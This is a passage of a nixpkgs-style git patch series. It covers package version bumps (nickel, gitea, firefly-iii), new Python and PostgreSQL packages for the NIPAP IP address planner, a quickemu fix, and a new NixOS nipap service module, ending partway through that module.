From 4f8dacc1998d4b52c945b2367a93bf91b17be4b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sandro=20J=C3=A4ckel?= Date: Mon, 16 Jun 2025 00:15:06 +0200 Subject: [PATCH 01/73] libblake3: split dev outputs from runtime --- pkgs/by-name/li/libblake3/package.nix | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/pkgs/by-name/li/libblake3/package.nix b/pkgs/by-name/li/libblake3/package.nix index 72ce99baa6bc..439634017266 100644 --- a/pkgs/by-name/li/libblake3/package.nix +++ b/pkgs/by-name/li/libblake3/package.nix @@ -13,6 +13,11 @@ stdenv.mkDerivation (finalAttrs: { pname = "libblake3"; version = "1.8.2"; + outputs = [ + "out" + "dev" + ]; + src = fetchFromGitHub { owner = "BLAKE3-team"; repo = "BLAKE3"; From 00eae402c32eb23a7be320a9bbb40d2021befd82 Mon Sep 17 00:00:00 2001 From: Yann Hamdaoui Date: Mon, 16 Jun 2025 17:16:39 +0200 Subject: [PATCH 02/73] Add yannham to the maintainer list --- maintainers/maintainer-list.nix | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/maintainers/maintainer-list.nix b/maintainers/maintainer-list.nix index 4ca444cecfd5..7f2e1acd7d99 100644 --- a/maintainers/maintainer-list.nix +++ b/maintainers/maintainer-list.nix @@ -27363,6 +27363,11 @@ github = "yanganto"; githubId = 10803111; }; + yannham = { + github = "yannham"; + githubId = 6530104; + name = "Yann Hamdaoui"; + }; yannickulrich = { email = "yannick.ulrich@proton.me"; github = "yannickulrich"; From c7082db884a50d425c1c07bf871fef6a07a12d87 Mon Sep 17 00:00:00 2001 From: Yann Hamdaoui Date: Mon, 16 Jun 2025 17:17:39 +0200 Subject: [PATCH 03/73] nickel: add yannham to maintainers --- pkgs/by-name/ni/nickel/package.nix | 1 + 1 file changed, 1 insertion(+) diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix index 5435356e206e..c60a028d5388 100644 --- a/pkgs/by-name/ni/nickel/package.nix +++ b/pkgs/by-name/ni/nickel/package.nix @@ -99,6 +99,7 @@ rustPlatform.buildRustPackage (finalAttrs: { maintainers = with lib.maintainers; [ felschr matthiasbeyer + yannham ]; mainProgram = "nickel"; }; From 1713262d28c814f3f01bb461718d1534fbdc82c3 Mon Sep 17 00:00:00 2001 From: Yann Hamdaoui Date: Mon, 16 Jun 2025 17:18:47 +0200 Subject: [PATCH 04/73] nickel: disable nix feature by default See https://github.com/tweag/nickel/issues/2284 --- pkgs/by-name/ni/nickel/package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix index c60a028d5388..e9ce620603ef 100644 --- a/pkgs/by-name/ni/nickel/package.nix +++ b/pkgs/by-name/ni/nickel/package.nix @@ -9,7 +9,7 @@ pkg-config, nixVersions, nix-update-script, - enableNixImport ? true, + enableNixImport ? false, }: rustPlatform.buildRustPackage (finalAttrs: { From e0ec68aee570cc84a402ad9ed66327ac51c0438f Mon Sep 17 00:00:00 2001 From: Yann Hamdaoui Date: Mon, 16 Jun 2025 17:19:35 +0200 Subject: [PATCH 05/73] nickel: 1.11.0 -> 1.12.0 --- pkgs/by-name/ni/nickel/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix index e9ce620603ef..556b4cfdb6f0 100644 --- a/pkgs/by-name/ni/nickel/package.nix +++ b/pkgs/by-name/ni/nickel/package.nix @@ -14,17 +14,17 @@ rustPlatform.buildRustPackage (finalAttrs: { pname = "nickel"; - version = "1.11.0"; + version = "1.12.0"; src = fetchFromGitHub { owner = "tweag"; repo = "nickel"; tag = finalAttrs.version; - hash = "sha256-I7cLVrkJhB3aJeE/A3tpFEUj0AkvcONSXD8NtnE5eQ0="; + hash = "sha256-iKLjYE4uT+luIRXjEuO7KjgkO+/jFpLjhCI5tO7TVMM="; }; useFetchCargoVendor = true; - cargoHash = "sha256-DzSfwBVeRT/GAXWyZKZjlDvj95bQzrkqIgZZ2EZw7eQ="; + cargoHash = "sha256-O/iat0JOvA90LD+ngAByLYQyd1VBeoa8yj7/NdEYprE="; cargoBuildFlags = [ "-p nickel-lang-cli" From ace78c7d30d96f37f1480ede7ba6afa0d3cb41d9 Mon Sep 17 00:00:00 2001 From: Ryan Omasta Date: Sat, 21 Jun 2025 05:58:23 -0600 Subject: [PATCH 06/73] gitea: 1.24.0 -> 1.24.2 https://github.com/go-gitea/gitea/releases/tag/v1.24.2 Diff: https://github.com/go-gitea/gitea/compare/v1.24.0...v1.24.2 --- pkgs/by-name/gi/gitea/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/gi/gitea/package.nix b/pkgs/by-name/gi/gitea/package.nix index e7c6f0a02568..a4237f3685f2 100644 --- a/pkgs/by-name/gi/gitea/package.nix +++ b/pkgs/by-name/gi/gitea/package.nix @@ -35,18 +35,18 @@ let in buildGoModule rec { pname = "gitea"; - version = "1.24.0"; + version = "1.24.2"; src = fetchFromGitHub { owner = "go-gitea"; repo = "gitea"; tag = "v${gitea.version}"; - hash = "sha256-lKeqoNL6RMjhm9egk6upbovJaWwm3r2kxi0Z9bjNxtI="; + hash = "sha256-NQSilSF/W69j1qEYYmlQfu2T0OefB+8yf9rCHAL8a6c="; }; proxyVendor = true; - vendorHash = "sha256-nC8y3skBhnOo7Ki9nc7Ni6UpheArB8bGK4AR/1Gdjr0="; + vendorHash = "sha256-VmlF86Sv6R2NmCtWi4kZ4rfmFAjgMB1RU/1jmnPiIkw="; outputs = [ "out" From bed132b2edf544eddd12111a4332415def230e73 Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 17:13:43 +0100 Subject: [PATCH 07/73] flask-xml-rpc-re: init at v0.2.0 --- .../flask-xml-rpc-re/default.nix | 48 +++++++++++++++++++ pkgs/top-level/python-packages.nix | 2 + 2 files changed, 50 insertions(+) create mode 100644 pkgs/development/python-modules/flask-xml-rpc-re/default.nix diff --git a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix new file mode 100644 index 000000000000..ed85b18fab09 --- /dev/null +++ b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix @@ -0,0 +1,48 @@ +{ + lib, + buildPythonPackage, + fetchFromGitHub, + setuptools, + flask, + nose2, +}: + +buildPythonPackage rec { + pname = "flask-xml-rpc-re"; + version = "0.2.0"; + + src = fetchFromGitHub { + owner = "Croydon"; + repo = "flask-xml-rpc-reloaded"; + tag = version; + hash = "sha256-S+9Ur22ExgVjKMOKG19cBz2aCVdEyOoS7uoz17CDzd8="; + }; + + build-system = [ + setuptools + ]; + + dependencies = [ + flask + ]; + + nativeCheckInputs = [ + nose2 + ]; + + checkPhase = '' + nose2 -v + ''; + + pythonImportsCheck = [ "flask_xmlrpcre" ]; + + meta = { + description = "Let your Flask apps provide XML-RPC APIs"; + license = lib.licenses.mit; + maintainers = with lib.maintainers; [ + lukegb + ]; + homepage = "https://github.com/Croydon/flask-xml-rpc-reloaded"; + changelog = "https://github.com/Croydon/flask-xml-rpc-reloaded/releases/tag/${version}"; + }; +} diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix index 1b091dda03be..55a1932550d1 100644 --- a/pkgs/top-level/python-packages.nix +++ b/pkgs/top-level/python-packages.nix @@ -5232,6 +5232,8 @@ self: super: with self; { flask-wtf = callPackage ../development/python-modules/flask-wtf { }; + flask-xml-rpc-re = callPackage ../development/python-modules/flask-xml-rpc-re { }; + flatbencode = callPackage ../development/python-modules/flatbencode { }; flatbuffers = callPackage ../development/python-modules/flatbuffers { inherit (pkgs) flatbuffers; }; From 39b9409d1a178a68fa844c6b80c48d8bf4c14354 Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 17:13:58 +0100 Subject: [PATCH 08/73] nipap: init at v0.32.7 This is both a Python module and an application, so it's inited as a Python module per the nixpkgs manual, and then translated into an application inside by-name. --- pkgs/by-name/ni/nipap/package.nix | 5 + .../python-modules/nipap/default.nix | 100 ++++++++++++++++++ pkgs/top-level/python-packages.nix | 2 + 3 files changed, 107 insertions(+) create mode 100644 pkgs/by-name/ni/nipap/package.nix create mode 100644 pkgs/development/python-modules/nipap/default.nix diff --git a/pkgs/by-name/ni/nipap/package.nix b/pkgs/by-name/ni/nipap/package.nix new file mode 100644 index 000000000000..ba60b802d831 --- /dev/null +++ b/pkgs/by-name/ni/nipap/package.nix @@ -0,0 +1,5 @@ +{ + python3Packages, +}: + +python3Packages.toPythonApplication python3Packages.nipap diff --git a/pkgs/development/python-modules/nipap/default.nix b/pkgs/development/python-modules/nipap/default.nix new file mode 100644 index 000000000000..d124306df59c --- /dev/null +++ b/pkgs/development/python-modules/nipap/default.nix @@ -0,0 +1,100 @@ +{ + lib, + buildPythonPackage, + fetchFromGitHub, + + # build deps + setuptools, + docutils, + + # dependencies + zipp, + importlib-metadata, + flask, + flask-compress, + flask-xml-rpc-re, + flask-restx, + requests, + ipy, + # indirect deps omitted: jinja2/markupsafe/werkzeug, + parsedatetime, + psutil, + psycopg2, + pyparsing, + python-dateutil, + pytz, + pyjwt, + tornado, + + # optional deps + ## ldap + python-ldap, +}: + +buildPythonPackage rec { + pname = "nipap"; + version = "0.32.7"; + pyproject = true; + + src = fetchFromGitHub { + owner = "SpriteLink"; + repo = "NIPAP"; + tag = "v${version}"; + hash = "sha256-FnCHW/yEhWtx+2fU+G6vxz50lWC7WL3cYKYOQzmH8zs="; + }; + + sourceRoot = "${src.name}/nipap"; + + pythonRelaxDeps = true; # deps are tightly specified by upstream + + postPatch = '' + substituteInPlace pyproject.toml \ + --replace-fail 'docutils==0.20.1' 'docutils' + ''; + + build-system = [ + setuptools + docutils + ]; + + dependencies = [ + zipp + importlib-metadata + flask + flask-compress + flask-xml-rpc-re + flask-restx + requests + ipy + # indirect deps omitted: jinja2/markupsafe/werkzeug + parsedatetime + psutil + psycopg2 + pyparsing + python-dateutil + pytz + pyjwt + tornado + ]; + + optional-dependencies = { + ldap = [ python-ldap ]; + }; + + doCheck = false; # tests require nose, /etc/nipap/nipap.conf and a running nipapd + + meta = { + description = "Neat IP Address Planner"; + longDescription = '' + NIPAP is the best open source IPAM in the known universe, + challenging classical IP address management (IPAM) systems in many areas. + ''; + homepage = "https://github.com/SpriteLink/NIPAP"; + changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}"; + license = lib.licenses.mit; + maintainers = with lib.maintainers; [ + lukegb + ]; + platforms = lib.platforms.all; + }; +} diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix index 55a1932550d1..ecf0477f3785 100644 --- a/pkgs/top-level/python-packages.nix +++ b/pkgs/top-level/python-packages.nix @@ -10204,6 +10204,8 @@ self: super: with self; { ninja = callPackage ../development/python-modules/ninja { inherit (pkgs) ninja; }; + nipap = callPackage ../development/python-modules/nipap { }; + nipreps-versions = callPackage ../development/python-modules/nipreps-versions { }; nipy = callPackage ../development/python-modules/nipy { }; From 8071d341875c47d1eeb5d8cd08600a2fdd98373a Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 17:39:08 +0100 Subject: [PATCH 09/73] pynipap: init at 0.32.7 --- .../python-modules/pynipap/default.nix | 38 +++++++++++++++++++ pkgs/top-level/python-packages.nix | 2 + 2 files changed, 40 insertions(+) create mode 100644 pkgs/development/python-modules/pynipap/default.nix diff --git a/pkgs/development/python-modules/pynipap/default.nix b/pkgs/development/python-modules/pynipap/default.nix new file mode 100644 index 000000000000..ee263f83210e --- /dev/null +++ b/pkgs/development/python-modules/pynipap/default.nix @@ -0,0 +1,38 @@ +{ + lib, + buildPythonPackage, + nipap, + + # build deps + setuptools, +}: + +buildPythonPackage rec { + pname = "pynipap"; + pyproject = true; + + inherit (nipap) version src; + + sourceRoot = "${src.name}/pynipap"; + + build-system = [ + setuptools + ]; + + doCheck = false; # tests require nose, /etc/nipap/nipap.conf and a running nipapd + + meta = { + description = "Python client library for Neat IP Address Planner"; + longDescription = '' + NIPAP is the best open source IPAM in the known universe, + challenging classical IP address management (IPAM) systems in many areas. + ''; + homepage = "https://github.com/SpriteLink/NIPAP"; + changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}"; + license = lib.licenses.mit; + maintainers = with lib.maintainers; [ + lukegb + ]; + platforms = lib.platforms.all; + }; +} diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix index ecf0477f3785..ccc4b1e63ea6 100644 --- a/pkgs/top-level/python-packages.nix +++ b/pkgs/top-level/python-packages.nix @@ -13141,6 +13141,8 @@ self: super: with self; { pynina = callPackage ../development/python-modules/pynina { }; + pynipap = callPackage ../development/python-modules/pynipap { }; + pynisher = callPackage ../development/python-modules/pynisher { }; pynitrokey = callPackage ../development/python-modules/pynitrokey { }; From 4abad970d7d207d04dddc8e648503e082ca22c6b Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 17:43:14 +0100 Subject: [PATCH 10/73] nipap-cli: init at 0.32.7 --- pkgs/by-name/ni/nipap-cli/package.nix | 53 +++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 pkgs/by-name/ni/nipap-cli/package.nix diff --git a/pkgs/by-name/ni/nipap-cli/package.nix b/pkgs/by-name/ni/nipap-cli/package.nix new file mode 100644 index 000000000000..4568bfe13755 --- /dev/null +++ b/pkgs/by-name/ni/nipap-cli/package.nix @@ -0,0 +1,53 @@ +{ + lib, + python312Packages, +}: + +let + python3Packages = python312Packages; +in +python3Packages.buildPythonApplication rec { + pname = "nipap-cli"; + inherit (python3Packages.nipap) version src; + pyproject = true; + + sourceRoot = "${src.name}/nipap-cli"; + + postPatch = '' + substituteInPlace pyproject.toml \ + --replace-fail 'docutils==0.20.1' 'docutils' + ''; + + build-system = with python3Packages; [ + setuptools + docutils + ]; + + dependencies = with python3Packages; [ + ipy + pynipap + ]; + + checkInputs = with python3Packages; [ + pythonImportsCheckHook + ]; + pythonImportsCheck = [ + "nipap_cli.nipap_cli" + ]; + + meta = { + description = "Neat IP Address Planner CLI"; + longDescription = '' + NIPAP is the best open source IPAM in the known universe, + challenging classical IP address management (IPAM) systems in many areas. + ''; + homepage = "https://github.com/SpriteLink/NIPAP"; + changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}"; + license = lib.licenses.mit; + maintainers = with lib.maintainers; [ + lukegb + ]; + platforms = lib.platforms.all; + mainProgram = "nipap"; + }; +} From 9c9c3642f0c96aa81319e620b7233d84ba9da746 Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 17:51:25 +0100 Subject: [PATCH 11/73] nipap-www: init at 0.32.7 --- pkgs/by-name/ni/nipap-www/package.nix | 51 +++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 pkgs/by-name/ni/nipap-www/package.nix diff --git a/pkgs/by-name/ni/nipap-www/package.nix b/pkgs/by-name/ni/nipap-www/package.nix new file mode 100644 index 000000000000..33355ce94a28 --- /dev/null +++ b/pkgs/by-name/ni/nipap-www/package.nix @@ -0,0 +1,51 @@ +{ + lib, + python3Packages, +}: + +python3Packages.buildPythonApplication rec { + pname = "nipap-www"; + inherit (python3Packages.nipap) version src; + pyproject = true; + + sourceRoot = "${src.name}/nipap-www"; + + postPatch = '' + # Load Flask config additionally from FLASK_ environment variables. + # This makes providing secrets easier. + sed -i nipapwww/__init__.py \ + -e '/^\s*app =/a\ app.config.from_prefixed_env()' + ''; + + pythonRelaxDeps = true; # deps are tightly specified + + build-system = with python3Packages; [ + setuptools + ]; + + dependencies = with python3Packages; [ + flask + nipap + pynipap + ]; + + passthru = { + inherit (python3Packages) gunicorn python; + pythonPath = python3Packages.makePythonPath dependencies; + }; + + meta = { + description = "Neat IP Address Planner CLI, web UI"; + longDescription = '' + NIPAP is the best open source IPAM in the known universe, + challenging classical IP address management (IPAM) systems in many areas. + ''; + homepage = "https://github.com/SpriteLink/NIPAP"; + changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}"; + license = lib.licenses.mit; + maintainers = with lib.maintainers; [ + lukegb + ]; + platforms = lib.platforms.all; + }; +} From 5a0374e20e3377e95725c15eb304fe073ba72349 Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 18:31:07 +0100 Subject: [PATCH 12/73] postgresqlPackages.ip4r: init at 2.4.2 --- pkgs/servers/sql/postgresql/ext/ip4r.nix | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 pkgs/servers/sql/postgresql/ext/ip4r.nix diff --git a/pkgs/servers/sql/postgresql/ext/ip4r.nix b/pkgs/servers/sql/postgresql/ext/ip4r.nix new file mode 100644 index 000000000000..277ec10618a6 --- /dev/null +++ b/pkgs/servers/sql/postgresql/ext/ip4r.nix @@ -0,0 +1,35 @@ +{ + fetchFromGitHub, + gitUpdater, + lib, + postgresql, + postgresqlBuildExtension, + postgresqlTestExtension, +}: + +postgresqlBuildExtension (finalAttrs: { + pname = "ip4r"; + version = "2.4.2"; + + src = fetchFromGitHub { + owner = "RhodiumToad"; + repo = "ip4r"; + tag = "${finalAttrs.version}"; + hash = "sha256-3chAD4f4A6VlXVSI0kfC/ANcnFy4vBp4FZpT6QRAueQ="; + }; + + passthru.tests = { + extension = postgresqlTestExtension { + inherit (finalAttrs) finalPackage; + sql = "CREATE EXTENSION ip4r;"; + }; + }; + + meta = { + description = "IPv4/v6 and IPv4/v6 range index type for PostgreSQL"; + homepage = "https://github.com/RhodiumToad/ip4r"; + license = lib.licenses.postgresql; + maintainers = with lib.maintainers; [ lukegb ]; + inherit (postgresql.meta) platforms; + }; +}) From 3dd6e7500a1127f0e09e05d39124a443d1db1993 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Robert=20Sch=C3=BCtz?= Date: Sun, 22 Jun 2025 16:38:25 -0700 Subject: [PATCH 13/73] quickemu: correctly handle version 10.0.0 of QEMU --- pkgs/by-name/qu/quickemu/package.nix | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/pkgs/by-name/qu/quickemu/package.nix b/pkgs/by-name/qu/quickemu/package.nix index fcbc23b9bdf1..5b0c4417bfe0 100644 --- a/pkgs/by-name/qu/quickemu/package.nix +++ b/pkgs/by-name/qu/quickemu/package.nix @@ -1,6 +1,7 @@ { lib, fetchFromGitHub, + fetchpatch, stdenv, makeWrapper, gitUpdater, @@ -67,6 +68,14 @@ stdenv.mkDerivation (finalAttrs: { hash = "sha256-sCoCcN6950pH33bRZsLoLc1oSs5Qfpj9Bbywn/uA6Bc="; }; + patches = [ + (fetchpatch { + name = "correctly-handle-version-10.0.0-of-qemu.patch"; + url = "https://github.com/quickemu-project/quickemu/commit/f25205f4513c4fa72be6940081c62e613d1fddc6.patch"; + hash = "sha256-OAXGyhMVDwbUypEPj/eRnH0wZYaL9WLGjbyoobe20UY="; + }) + ]; + postPatch = '' sed -i \ -e '/OVMF_CODE_4M.secboot.fd/s|ovmfs=(|ovmfs=("${OVMFFull.firmware}","${OVMFFull.variables}" |' \ From 18f89bfb370f5a496fd2a4cac5d497e87a6a81f4 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Mon, 23 Jun 2025 17:23:08 +0000 Subject: [PATCH 14/73] firefly-iii: 6.2.17 -> 6.2.18 --- pkgs/by-name/fi/firefly-iii/package.nix | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/pkgs/by-name/fi/firefly-iii/package.nix b/pkgs/by-name/fi/firefly-iii/package.nix index 005f8b172f2f..172d5445f65b 100644 --- a/pkgs/by-name/fi/firefly-iii/package.nix +++ b/pkgs/by-name/fi/firefly-iii/package.nix @@ -13,13 +13,13 @@ stdenvNoCC.mkDerivation (finalAttrs: { pname = "firefly-iii"; - version = "6.2.17"; + version = "6.2.18"; src = fetchFromGitHub { owner = "firefly-iii"; repo = "firefly-iii"; tag = "v${finalAttrs.version}"; - hash = "sha256-g/mGCc7JxfWrbrh14OXaKgn0rjf4RMNL2NI4GzrphaY="; + hash = "sha256-QQlfUbDanyj3n0EOhPxfMqsrl9laQq2CQbwRY4/gH8k="; }; buildInputs = [ php84 ]; @@ -38,13 +38,13 @@ stdenvNoCC.mkDerivation (finalAttrs: { composerNoScripts = true; composerStrictValidation = true; strictDeps = true; - vendorHash = "sha256-2GvBlKRTqehD7eVpEGd9zBoiom30DRMqatyHNF4eDiU="; + vendorHash = "sha256-h/DWKOlffEBWZhdf5iQf4f33IK+1Ie289Oqjb7GHfVY="; }; npmDeps = fetchNpmDeps { inherit (finalAttrs) src; name = "${finalAttrs.pname}-npm-deps"; - hash = "sha256-uZluWsHpbD2lMG/yNoZxry5X+Hiv3z/H4KqV7pydu/A="; + hash = "sha256-YbMUM+fXIuXVrv7QMlPklct3mDHI05PoOW+fgHf8c3I="; }; preInstall = '' From a013d9258c510d8660e64aaf1200946864959d6a Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 15 Jun 2025 20:04:30 +0100 Subject: [PATCH 15/73] nixos/nipap: init --- .../manual/release-notes/rl-2511.section.md | 2 + nixos/modules/module-list.nix | 1 + nixos/modules/services/web-apps/nipap.nix | 331 ++++++++++++++++++ .../flask-xml-rpc-re/default.nix | 4 +- pkgs/servers/sql/postgresql/ext/ip4r.nix | 1 - 5 files changed, 337 insertions(+), 2 deletions(-) create mode 100644 nixos/modules/services/web-apps/nipap.nix diff --git a/nixos/doc/manual/release-notes/rl-2511.section.md b/nixos/doc/manual/release-notes/rl-2511.section.md index 295d9ede7118..68cb1da77d91 100644 --- a/nixos/doc/manual/release-notes/rl-2511.section.md +++ b/nixos/doc/manual/release-notes/rl-2511.section.md @@ -40,6 +40,8 @@ - [Szurubooru](https://github.com/rr-/szurubooru), an image board engine inspired by services such as Danbooru, dedicated for small and medium communities. Available as [services.szurubooru](#opt-services.szurubooru.enable). +- The [Neat IP Address Planner](https://spritelink.github.io/NIPAP/) (NIPAP) can now be enabled through [services.nipap.enable](#opt-services.nipap.enable). + - [nix-store-veritysetup](https://github.com/nikstur/nix-store-veritysetup-generator), a systemd generator to unlock the Nix Store as a dm-verity protected block device. Available as [boot.initrd.nix-store-veritysetup](options.html#opt-boot.initrd.nix-store-veritysetup.enable). - [SuiteNumérique Docs](https://github.com/suitenumerique/docs), a collaborative note taking, wiki and documentation web platform and alternative to Notion or Outline. Available as [services.lasuite-docs](#opt-services.lasuite-docs.enable). diff --git a/nixos/modules/module-list.nix b/nixos/modules/module-list.nix index 036490c9589a..7e14a5e809b5 100644 --- a/nixos/modules/module-list.nix +++ b/nixos/modules/module-list.nix @@ -1617,6 +1617,7 @@ ./services/web-apps/nextjs-ollama-llm-ui.nix ./services/web-apps/nexus.nix ./services/web-apps/nifi.nix + ./services/web-apps/nipap.nix ./services/web-apps/node-red.nix ./services/web-apps/nostr-rs-relay.nix ./services/web-apps/ocis.nix diff --git a/nixos/modules/services/web-apps/nipap.nix b/nixos/modules/services/web-apps/nipap.nix new file mode 100644 index 000000000000..3a8e082ad037 --- /dev/null +++ b/nixos/modules/services/web-apps/nipap.nix @@ -0,0 +1,331 @@ +{ + config, + lib, + pkgs, + ... +}: + +let + cfg = config.services.nipap; + iniFmt = pkgs.formats.ini { }; + + configFile = iniFmt.generate "nipap.conf" cfg.settings; + + defaultUser = "nipap"; + defaultAuthBackend = "local"; + dataDir = "/var/lib/nipap"; + + defaultServiceConfig = { + WorkingDirectory = dataDir; + User = cfg.user; + Group = config.users.users."${cfg.user}".group; + Restart = "on-failure"; + RestartSec = 30; + }; + + escapedHost = host: if lib.hasInfix ":" host then "[${host}]" else host; +in +{ + options.services.nipap = { + enable = lib.mkEnableOption "global Neat IP Address Planner (NIPAP) configuration"; + + user = lib.mkOption { + type = lib.types.str; + description = "User to use for running NIPAP services."; + default = defaultUser; + }; + + settings = lib.mkOption { + description = '' + Configuration options to set in /etc/nipap/nipap.conf. + ''; + + default = { }; + + type = lib.types.submodule { + freeformType = iniFmt.type; + + options = { + nipapd = { + listen = lib.mkOption { + type = lib.types.str; + default = "::1"; + description = "IP address to bind nipapd to."; + }; + port = lib.mkOption { + type = lib.types.port; + default = 1337; + description = "Port to bind nipapd to."; + }; + + foreground = lib.mkOption { + type = lib.types.bool; + default = true; + description = "Remain in foreground rather than forking to background."; + }; + debug = lib.mkOption { + type = lib.types.bool; + default = false; + description = "Enable debug logging."; + }; + + db_host = lib.mkOption { + type = lib.types.str; + default = ""; + description = "PostgreSQL host to connect to. Empty means use UNIX socket."; + }; + db_name = lib.mkOption { + type = lib.types.str; + default = cfg.user; + defaultText = defaultUser; + description = "Name of database to use on PostgreSQL server."; + }; + }; + + auth = { + default_backend = lib.mkOption { + type = lib.types.str; + default = defaultAuthBackend; + description = "Name of auth backend to use by default."; + }; + auth_cache_timeout = lib.mkOption { + type = lib.types.int; + default = 3600; + description = "Seconds to store cached auth entries for."; + }; + }; + }; + }; + }; + + authBackendSettings = lib.mkOption { + description = '' + auth.backends options to set in /etc/nipap/nipap.conf. + ''; + + default = { + "${defaultAuthBackend}" = { + type = "SqliteAuth"; + db_path = "${dataDir}/local_auth.db"; + }; + }; + + type = lib.types.submodule { + freeformType = iniFmt.type; + }; + }; + + nipapd = { + enable = lib.mkEnableOption "nipapd server"; + package = lib.mkPackageOption pkgs "nipap" { }; + + database.createLocally = lib.mkOption { + type = lib.types.bool; + default = true; + description = "Create a nipap database automatically."; + }; + }; + + nipap-www = { + enable = lib.mkEnableOption "nipap-www server"; + package = lib.mkPackageOption pkgs "nipap-www" { }; + + xmlrpcURIFile = lib.mkOption { + type = lib.types.nullOr lib.types.path; + default = null; + description = "Path to file containing XMLRPC URI for use by web UI - this is a secret, since it contains auth credentials. If null, it will be initialized assuming that the auth database is local."; + }; + + workers = lib.mkOption { + type = lib.types.int; + default = 4; + description = "Number of worker processes for Gunicorn to fork."; + }; + umask = lib.mkOption { + type = lib.types.str; + default = "0"; + description = "umask for files written by Gunicorn, including UNIX socket."; + }; + + unixSocket = lib.mkOption { + type = lib.types.nullOr lib.types.str; + default = null; + description = "Path to UNIX socket to bind to."; + example = "/run/nipap/nipap-www.sock"; + }; + host = lib.mkOption { + type = lib.types.nullOr lib.types.str; + default = "::"; + description = "Host to bind to."; + }; + port = lib.mkOption { + type = lib.types.nullOr lib.types.port; + default = 21337; + description = "Port to bind to."; + }; + }; + }; + + config = lib.mkIf cfg.enable ( + lib.mkMerge [ + { + systemd.tmpfiles.rules = [ + "d '${dataDir}' - ${cfg.user} ${config.users.users."${cfg.user}".group} - -" + ]; + + environment.etc."nipap/nipap.conf" = { + source = configFile; + }; + + services.nipap.settings = lib.attrsets.mapAttrs' (name: value: { + name = "auth.backends.${name}"; + inherit value; + }) cfg.authBackendSettings; + + services.nipap.nipapd.enable = lib.mkDefault true; + services.nipap.nipap-www.enable = lib.mkDefault true; + + environment.systemPackages = [ + cfg.nipapd.package + ]; + } + (lib.mkIf (cfg.user == defaultUser) { + users.users."${defaultUser}" = { + isSystemUser = true; + group = defaultUser; + home = dataDir; + }; + users.groups."${defaultUser}" = { }; + }) + (lib.mkIf (cfg.nipapd.enable && cfg.nipapd.database.createLocally) { + services.postgresql = { + enable = true; + extensions = ps: with ps; [ ip4r ]; + ensureUsers = [ + { + name = cfg.user; + } + ]; + ensureDatabases = [ cfg.settings.nipapd.db_name ]; + }; + + systemd.services.postgresql.serviceConfig.ExecStartPost = + let + sqlFile = pkgs.writeText "nipapd-setup.sql" '' + CREATE EXTENSION IF NOT EXISTS ip4r; + + ALTER SCHEMA public OWNER TO "${cfg.user}"; + ALTER DATABASE "${cfg.settings.nipapd.db_name}" OWNER TO "${cfg.user}"; + ''; + in + [ + '' + ${lib.getExe' config.services.postgresql.finalPackage "psql"} -d "${cfg.settings.nipapd.db_name}" -f "${sqlFile}" + '' + ]; + }) + (lib.mkIf cfg.nipapd.enable { + systemd.services.nipapd = + let + pkg = cfg.nipapd.package; + in + { + description = "Neat IP Address Planner"; + after = [ + "network.target" + "systemd-tmpfiles-setup.service" + ] ++ lib.optional (cfg.settings.nipapd.db_host == "") "postgresql.service"; + requires = lib.optional (cfg.settings.nipapd.db_host == "") "postgresql.service"; + wantedBy = [ "multi-user.target" ]; + preStart = lib.optionalString (cfg.settings.auth.default_backend == defaultAuthBackend) '' + # Create/upgrade local auth database + umask 077 + ${pkg}/bin/nipap-passwd create-database >/dev/null 2>&1 + ${pkg}/bin/nipap-passwd upgrade-database >/dev/null 2>&1 + ''; + serviceConfig = defaultServiceConfig // { + KillSignal = "SIGINT"; + ExecStart = '' + ${pkg}/bin/nipapd \ + --auto-install-db \ + --auto-upgrade-db \ + --foreground \ + --no-pid-file + ''; + }; + }; + }) + (lib.mkIf cfg.nipap-www.enable { + assertions = [ + { + assertion = + cfg.nipap-www.xmlrpcURIFile == null -> cfg.settings.auth.default_backend == defaultAuthBackend; + message = "If no XMLRPC URI secret file is specified, then the default auth backend must be in use to automatically generate credentials."; + } + ]; + + # Ensure that _something_ exists in the [www] group. + services.nipap.settings.www = lib.mkDefault { }; + + systemd.services.nipap-www = + let + pkg = cfg.nipap-www.package; + in + { + description = "Neat IP Address Planner web server"; + after = [ + "network.target" + "systemd-tmpfiles-setup.service" + ] ++ lib.optional cfg.nipapd.enable "nipapd.service"; + wantedBy = [ "multi-user.target" ]; + environment = { + PYTHONPATH = 